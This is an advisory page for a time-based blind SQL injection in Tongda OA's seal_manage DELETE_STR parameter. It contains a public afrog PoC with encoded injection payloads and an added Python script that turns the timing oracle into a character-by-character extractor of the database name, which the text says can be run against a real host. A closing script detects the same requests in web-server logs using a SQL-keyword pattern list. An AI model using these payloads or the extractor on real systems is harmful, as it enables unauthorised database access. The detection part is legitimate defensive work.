CVE-2023-4166-2: Tongda OA seal_manage SQL Injection

Date: 2025-09-01 | Affected software: Tongda OA | PoC: public

Vulnerability description

The vulnerability affects unknown code in the file general/system/seal_manage/dianju/delete_log.php. Manipulation of the DELETE_STR parameter leads to SQL injection. The PoC below exercises the sibling endpoint general/system/seal_manage/iweboffice/delete_seal.php with the same DELETE_STR parameter and confirms the injection through a time-based blind oracle: a heavy cartesian join over information_schema.columns is only executed when the injected condition is true, so response latency reveals one character of DATABASE() per request while the HTTP status (302) stays the same either way.

PoC code [public]

id: CVE-2023-4166-2

info:
  name: Tongda OA seal_manage SQL injection
  author: zan8in
  severity: high
  verified: true
  description: |-
    The vulnerability affects unknown code in the file general/system/seal_manage/dianju/delete_log.php. Manipulation of the DELETE_STR parameter leads to SQL injection.
  reference:
    - https://mp.weixin.qq.com/s/37VKi2Az7LX9G9wVYe6POQ
    - https://mp.weixin.qq.com/s/VoSGMmGOaichZESFa51iRw
    - https://mp.weixin.qq.com/s/HE1HgzXSGcBCG_3s_UJb0g
  tags: cve,cve2023,tongda,oa,sqli
  created: 2023/08/07

rules:
  # r00: fingerprint the seal module's log page (title "印章日志", seal log)
  # before spending any timing requests on the target.
  r00:
    request:
      method: GET
      path: /general/system/seal_manage/dianju/log.php?start=
    expression: response.status == 200 && response.body.bcontains(b'<title>印章日志</title>')
  # r0: expected-true guess, first character of DATABASE() == 't' (char(116)).
  # The heavy information_schema cartesian join runs, so the latency t1 is
  # the "slow" baseline for the rest of the chain.
  r0:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
    expression: response.status == 302
    output:
      t1: response.latency
  # r1: expected-false guess ('s', char(115)). MySQL short-circuits the AND,
  # the join is skipped, and the response must arrive in at most half of t1.
  r1:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t1: "{{t1}}"
    expression: response.status == 302 && response.latency <= t1/2
    output:
      t2: response.latency
  # r2: second character == 'd' (char(100)); must be about as slow as t1 (within 500 ms).
  r2:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),2,1))=char(100)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t2: "{{t2}}"
    expression: response.status == 302 && response.latency >= (t1-500)
    output:
      t3: response.latency
  # r3: second character == 'e' (char(101)); expected false, must be fast.
  r3:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),2,1))=char(101)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t3: "{{t3}}"
    expression: response.status == 302 && response.latency <= t1/2
    output:
      t4: response.latency
  # r4: third character == '_' (char(95)); expected true, must be slow.
  r4:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),3,1))=char(95)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t4: "{{t4}}"
    expression: response.status == 302 && response.latency >= (t1-500)
    output:
      t5: response.latency
  # r5: third character == '`' (char(96)); expected false, must be fast.
  # Alternating true/false guesses keeps a merely slow server from passing.
  r5:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),3,1))=char(96)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t5: "{{t5}}"
    expression: response.status == 302 && response.latency <= t1/2
expression: r00() && r0() && r1() && r2() && r3() && r4() && r5()
  
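The script below is an added example and is not part of this page, of afrog, or of Tongda OA. It re-implements the PoC's timing oracle in Python: the same DELETE_STR shape, the same expected-true / expected-false guess pairs, and the same acceptance rules (a false guess must finish within half of the slow baseline, a true guess within 500 ms of it). It then goes beyond the PoC's three fixed guesses with a generic loop that recovers DATABASE() one character at a time. The `send` transport (URL path in, `(status, latency_ms)` out) and the simulated target, whose database name `td_oa` is a constructed value chosen only to agree with the PoC's guesses, are assumptions; swap in an HTTP client to run it against a real host.

```python
"""Time-based blind SQLi check modelled on the afrog PoC above (added example)."""
import re
import string
from typing import Callable, Tuple
from urllib.parse import quote, unquote

# Endpoint and heavy sub-query copied from the afrog rules on this page.
ENDPOINT = "/general/system/seal_manage/iweboffice/delete_seal.php"
HEAVY = "(select count(*) from information_schema.columns A,information_schema.columns B)"

# Assumed transport: request path -> (HTTP status, latency in milliseconds).
Sender = Callable[[str], Tuple[int, float]]


def inject(cond: str) -> str:
    """Wrap a boolean condition in the PoC's injection shape,
    1) and <cond> and <heavy query> and(1)=(1 .
    MySQL short-circuits AND, so the cartesian join only runs when <cond> is true."""
    value = f"1) and {cond} and {HEAVY} and(1)=(1"
    return f"{ENDPOINT}?DELETE_STR={quote(value, safe='()=,*')}"


def char_cond(pos: int, ch: str) -> str:
    """Condition used by the PoC: one character of DATABASE() against char(N)."""
    return f"(substr(DATABASE(),{pos},1))=char({ord(ch)})"


def calibrate(send: Sender) -> Tuple[float, float]:
    """Measure a known-true and a known-false condition (the PoC's r0/r1 idea).
    The false case must finish in at most half the true case, otherwise
    timing is not a usable oracle on this target."""
    status, slow = send(inject("(1)=(1)"))
    if status != 302:
        raise RuntimeError(f"unexpected status {status}; the PoC expects 302")
    _, fast = send(inject("(1)=(2)"))
    if fast > slow / 2:
        raise RuntimeError(f"timing not separable: true={slow}ms false={fast}ms")
    return slow, fast


def is_true(send: Sender, cond: str, slow: float) -> bool:
    """PoC rules r2/r4: a true guess lands within 500 ms of the slow baseline."""
    status, latency = send(inject(cond))
    return status == 302 and latency >= slow - 500


def verify(send: Sender) -> bool:
    """Reproduce the page's r0..r5 chain: 't','d','_' must all read as true
    and the neighbouring guesses 's','e','`' must all read as false."""
    slow, _ = calibrate(send)
    truths = [is_true(send, char_cond(i, c), slow) for i, c in enumerate("td_", 1)]
    lies = [is_true(send, char_cond(i, c), slow) for i, c in enumerate("se`", 1)]
    return all(truths) and not any(lies)


def extract_database(send: Sender, max_len: int = 32,
                     charset: str = string.ascii_lowercase + string.digits + "_") -> str:
    """Generalisation (not in the PoC): recover DATABASE() character by character.
    substr() past the end returns '', which matches no char(N), so the scan
    stops at the first position where no candidate is slow."""
    slow, _ = calibrate(send)
    name = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if is_true(send, char_cond(pos, ch), slow):
                name += ch
                break
        else:
            break
    return name


# Constructed offline target (assumption): behaves like a MySQL-backed
# delete_seal.php whose current database is named "td_oa".
_COND = re.compile(r"DELETE_STR=1\) and (.*?) and \(select")
_CHAR = re.compile(r"\(substr\(DATABASE\(\),(\d+),1\)\)=char\((\d+)\)")


def simulated_target(db_name: str = "td_oa", slow_ms: float = 3000,
                     fast_ms: float = 40) -> Sender:
    def evaluate(cond: str) -> bool:
        m = _CHAR.fullmatch(cond)
        if m:
            pos, code = int(m.group(1)), int(m.group(2))
            return db_name[pos - 1:pos] == chr(code)
        if cond == "(1)=(1)":
            return True
        if cond == "(1)=(2)":
            return False
        raise ValueError(f"simulator cannot evaluate {cond!r}")

    def send(path: str) -> Tuple[int, float]:
        cond = _COND.search(unquote(path)).group(1)
        # The page always redirects (302); only the elapsed time leaks anything.
        return 302, (slow_ms if evaluate(cond) else fast_ms)

    return send
```

Running `verify(simulated_target())` performs the eight requests of the PoC and returns True; `extract_database(simulated_target())` returns the constructed name `td_oa`. The calibration step is the part worth keeping when adapting this to a real host: without a separable slow/fast pair, every later decision is noise.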

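On the defensive side, the following added example (not from this page or from Tongda OA) shows how the same request pattern looks in web-server logs. It parses constructed Apache combined-format lines, decodes the DELETE_STR value of any request under /general/system/seal_manage/ (which covers both the advisory's delete_log.php and the PoC's delete_seal.php), and flags SQL fragments that never belong in a list of record identifiers. The sample log lines, the second decoding pass for double-encoded values, and the keyword list are all assumptions.

```python
"""Access-log detection for the seal_manage DELETE_STR injection (added example)."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SEAL_PATH = re.compile(r"^/general/system/seal_manage/.+\.php$")
# SQL fragments that have no business in a DELETE_STR value (assumed list).
SQLI_HINT = re.compile(
    r"information_schema|substr\(|char\(|\bselect\b|\bunion\b|sleep\(|benchmark\(",
    re.IGNORECASE,
)


def inspect_target(target: str) -> Optional[Tuple[str, str]]:
    """Return (decoded DELETE_STR, first matched SQL fragment) for a request
    to a seal_manage PHP page that carries injection markers, else None."""
    parts = urlsplit(target)
    if not SEAL_PATH.match(parts.path):
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get("DELETE_STR", []):
        # parse_qs decodes once; decode again so %2520-style double encoding
        # (assumed evasion, not seen on the page) cannot hide the keywords.
        value = unquote(raw)
        m = SQLI_HINT.search(value)
        if m:
            return value, m.group(0).lower()
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, int, str, str]]:
    """Return (client ip, status, fragment, decoded value) per flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = inspect_target(m["target"])
        if found:
            value, fragment = found
            hits.append((m["ip"], int(m["status"]), fragment, value))
    return hits


# Constructed sample: a benign deletion, the PoC's r0 request, an unrelated
# page, and a sleep()-based variant against the advisory's delete_log.php.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2025:10:00:01 +0800] "GET /general/system/seal_manage/'
    'iweboffice/delete_seal.php?DELETE_STR=12,15 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Sep/2025:10:00:02 +0800] "GET /general/system/seal_manage/'
    'iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)'
    '%20and%20(select%20count(*)%20from%20information_schema.columns%20A,'
    'information_schema.columns%20B)%20and(1)=(1 HTTP/1.1" 302 0 "-" "afrog"',
    '10.0.0.5 - - [01/Sep/2025:10:00:03 +0800] "GET /general/index.php HTTP/1.1" '
    '200 4311 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Sep/2025:10:00:04 +0800] "GET /general/system/seal_manage/'
    'dianju/delete_log.php?DELETE_STR=1)%20and%20sleep(5)%23 HTTP/1.1" 302 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for ip, status, fragment, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {fragment!r} <- {value}")
```

Because the vulnerable page answers 302 whether or not the injection succeeded, the status code is not a signal; the decoded parameter value is. A long run of requests from one client that differ only in the `substr(DATABASE(),N,1))=char(M)` position and code, as the PoC generates, is the second thing to look for.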